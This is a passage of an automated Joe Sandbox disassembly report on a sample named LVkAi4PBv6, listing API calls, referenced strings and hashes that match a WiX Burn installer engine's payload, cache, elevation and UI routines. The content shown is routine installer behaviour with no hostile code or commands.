                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00862FA3
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00862FB7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0086301F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • pathutil.cpp, xrefs: 00862E8D
                                                                                                                                                                                                                                                                                                  • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00862F66
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                                                                                                                                                  • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3480017824-1101990113
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9420e2abbc68ff35d03b68f47c2b1d7062bf07d63cfebba6d6b77694dd025ff6
                                                                                                                                                                                                                                                                                                  • Instruction ID: d236f73816a3484bcb964850a924caa94f24fbe98e60a63a1a4f6bc32648093c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9420e2abbc68ff35d03b68f47c2b1d7062bf07d63cfebba6d6b77694dd025ff6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10716272D01529ABDB319BA89C49BAAB7B8FB08710F0101E5FA04E7191D7749E848F91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,771ADFD0,?,008A72C8,?,?), ref: 008A6DA6
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6E11
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6E89
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6EC8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Free$Compare
                                                                                                                                                                                                                                                                                                  • String ID: label$scheme$term
                                                                                                                                                                                                                                                                                                  • API String ID: 1324494773-4117840027
                                                                                                                                                                                                                                                                                                  • Opcode ID: e8b72a6071e9c4612b0f762f6b3368bc5a900b13d1e91fdf4beb206a335df1d9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9148babbf5aaa9873d15f5f0f569b8130065dc60793471a9389e894ae027d469
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8b72a6071e9c4612b0f762f6b3368bc5a900b13d1e91fdf4beb206a335df1d9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F516D75901219EBEF15CB94C844FAEBBB8FF06711F2842A8F511E66A4E7319E20DB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,008653BD,00000000,00865489,00865445,WixBundleUILevel,840F01E8,?,00000001), ref: 0086CC1C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • payload.cpp, xrefs: 0086CD1D
                                                                                                                                                                                                                                                                                                  • Failed to find embedded payload: %ls, xrefs: 0086CC48
                                                                                                                                                                                                                                                                                                  • Failed to get directory portion of local file path, xrefs: 0086CCF5
                                                                                                                                                                                                                                                                                                  • Failed to ensure directory exists, xrefs: 0086CCEE
                                                                                                                                                                                                                                                                                                  • Failed to get next stream., xrefs: 0086CD03
                                                                                                                                                                                                                                                                                                  • Failed to extract file., xrefs: 0086CCE7
                                                                                                                                                                                                                                                                                                  • Payload was not found in container: %ls, xrefs: 0086CD29
                                                                                                                                                                                                                                                                                                  • Failed to concat file paths., xrefs: 0086CCFC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-1711239286
                                                                                                                                                                                                                                                                                                  • Opcode ID: c26c2df9f4d4bb0b9b5baf5ffcd8ec531c5a41a84cdab382a440f2a5d1c71b60
                                                                                                                                                                                                                                                                                                  • Instruction ID: e3220e66a246e04fa6bf582831101f33eae947b2aba5a2c7972e484e8bf5c63e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c26c2df9f4d4bb0b9b5baf5ffcd8ec531c5a41a84cdab382a440f2a5d1c71b60
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4641F031A40219EBDF259F88CC819BEBBA4FF01710F12817AE999EB352D7349D40DB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 008647BB
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 008647C1
                                                                                                                                                                                                                                                                                                  • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0086484F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Unexpected return value from message pump., xrefs: 008648A5
                                                                                                                                                                                                                                                                                                  • Failed to load UX., xrefs: 00864804
                                                                                                                                                                                                                                                                                                  • Failed to start bootstrapper application., xrefs: 0086481D
                                                                                                                                                                                                                                                                                                  • wininet.dll, xrefs: 008647EE
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 0086489B
                                                                                                                                                                                                                                                                                                  • Failed to create engine for UX., xrefs: 008647DB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message$CurrentPeekThread
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 673430819-2573580774
                                                                                                                                                                                                                                                                                                  • Opcode ID: cccb1b03d3655b93bc7d56a4dbcfa675c0ea851f31ff6dc51e08c9b0194b2c13
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5bb39f6c77591dae6017b2129adc422f4cd15a58a2e0860fec8ce22dac228566
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cccb1b03d3655b93bc7d56a4dbcfa675c0ea851f31ff6dc51e08c9b0194b2c13
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7341BF71A00659BFEB119BA8CC85EBEB7ACFF05318F110235F904E7691DB34AD4587A1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,0088B03E,?,00000001,00000000), ref: 00889D0F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0088B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00889D19
                                                                                                                                                                                                                                                                                                  • CopyFileExW.KERNEL32(00000000,00000000,00889B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00889D67
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0088B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00889D96
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$AttributesCopy
                                                                                                                                                                                                                                                                                                  • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                                                                                                                                                                                                                                                  • API String ID: 1969131206-836986073
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5886ecd06bcd201574a4e59fbcbf4ebc2574e8bf287d9fec1a951e722b2a346d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 89388696fb8b046e0038f50f5606a33cc4f970f4e5cac1bb42ea342fefd2838a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5886ecd06bcd201574a4e59fbcbf4ebc2574e8bf287d9fec1a951e722b2a346d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B310872A01225BBEB20AE558C45EBB77A9FF42B20B198128FD54EB342D725CD00C7E5
APIs
• LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 00879007
Strings
• Failed to allocate access for SYSTEM group to path: %ls, xrefs: 00878F30
• cache.cpp, xrefs: 00878FB0
• Failed to allocate access for Users group to path: %ls, xrefs: 00878F72
• Failed to secure cache path: %ls, xrefs: 00878FEA
• Failed to allocate access for Administrators group to path: %ls, xrefs: 00878F0F
• Failed to create ACL to secure cache path: %ls, xrefs: 00878FBB
• Failed to allocate access for Everyone group to path: %ls, xrefs: 00878F51
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: FreeLocal
• String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
• API String ID: 2826327444-4113288589
APIs
• ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 0087495A
• GetLastError.KERNEL32 ref: 00874967
• ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 00874A12
• GetLastError.KERNEL32 ref: 00874A1C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
• API String ID: 1948546556-773887359
APIs
• LoadBitmapW.USER32(?,00000001), ref: 0087E2E5
• GetLastError.KERNEL32 ref: 0087E2F1
• GetObjectW.GDI32(00000000,00000018,?), ref: 0087E338
• GetCursorPos.USER32(?), ref: 0087E359
• MonitorFromPoint.USER32(?,?,00000002), ref: 0087E36B
• GetMonitorInfoW.USER32(00000000,?), ref: 0087E381
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
• String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
• API String ID: 2342928100-598475503
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,?,?,008AB500), ref: 008750D3
• GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00875171
• CloseHandle.KERNEL32(00000000), ref: 0087518A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: Process$CloseCurrentHandle
• String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
• API String ID: 2815245435-1352204306
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 008668AC
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 008668B3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008668BD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 00866929
                                                                                                                                                                                                                                                                                                  • Failed to find DllGetVersion entry point in msi.dll., xrefs: 008668EB
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 008668E1
                                                                                                                                                                                                                                                                                                  • Failed to get msi.dll version info., xrefs: 00866905
                                                                                                                                                                                                                                                                                                  • DllGetVersion, xrefs: 0086689E
                                                                                                                                                                                                                                                                                                  • msi, xrefs: 008668A3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,008647FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0086548E,?), ref: 0086D6DA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008647FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0086548E,?,?), ref: 0086D6E7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0086D71F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008647FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0086548E,?,?), ref: 0086D72B
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 00861186
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 00861191
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0086119F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 008611BA
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008611C2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 008611D7
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                                                                                                                                                                                                                                                  • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0087F64E
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0087F7C9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • UX did not provide container or payload id., xrefs: 0087F7B8
                                                                                                                                                                                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 0087F6A3
                                                                                                                                                                                                                                                                                                  • Failed to set download password., xrefs: 0087F777
                                                                                                                                                                                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0087F6F3
                                                                                                                                                                                                                                                                                                  • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 0087F6B9
                                                                                                                                                                                                                                                                                                  • Failed to set download URL., xrefs: 0087F728
                                                                                                                                                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 0087F668
                                                                                                                                                                                                                                                                                                  • Failed to set download user., xrefs: 0087F751
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-2615595102
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3738b19ef8267822132e2495f1cc9d9aa9188b93a4eca05ed0f554f13f1269aa
                                                                                                                                                                                                                                                                                                  • Instruction ID: ff553fcd012c15ddfa424e433c93a1c50c86c0b1e7ce19585895a6732b0af1e9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3738b19ef8267822132e2495f1cc9d9aa9188b93a4eca05ed0f554f13f1269aa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5412932A00652EBDB299F29CC85E6A73A8FF15750B15C135F918E735ADB34EC40C792
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 008A5A9B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A5AA9
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 008A5AEA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A5AF7
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008A5C6A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008A5C79
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                                                                                                                                                                  • String ID: GET$dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2028584396-3303425918
                                                                                                                                                                                                                                                                                                  • Opcode ID: c899576842e587eb5facc181c476a059c2d4de4c70e1e5f20f55a9a5985c1972
                                                                                                                                                                                                                                                                                                  • Instruction ID: 32402044a047e5ec6695a095c0edc26a0a3475a97ce27375d5c57be33389b5c8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c899576842e587eb5facc181c476a059c2d4de4c70e1e5f20f55a9a5985c1972
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B614B72A00619ABEB11CFA4CC45BAEBBB8FF49765F150119FE14F7640E770D9808BA0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00871020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,00870C6F,?,00000000,?,00000000,00000000), ref: 0087104F
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 00870DF3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00870E00
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to create syncpoint event., xrefs: 00870E2E
                                                                                                                                                                                                                                                                                                  • plan.cpp, xrefs: 00870E24
                                                                                                                                                                                                                                                                                                  • Failed to append cache action., xrefs: 00870D4A
                                                                                                                                                                                                                                                                                                  • Failed to append rollback cache action., xrefs: 00870CCF
                                                                                                                                                                                                                                                                                                  • Failed to append package start action., xrefs: 00870C95
                                                                                                                                                                                                                                                                                                  • Failed to append payload cache action., xrefs: 00870DAA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareCreateErrorEventLastString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 801187047-2489563283
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c7c43e9b4af2c76680b93e39cbbcb6a652a8b8e31d12fc29ae6f501adee0f24
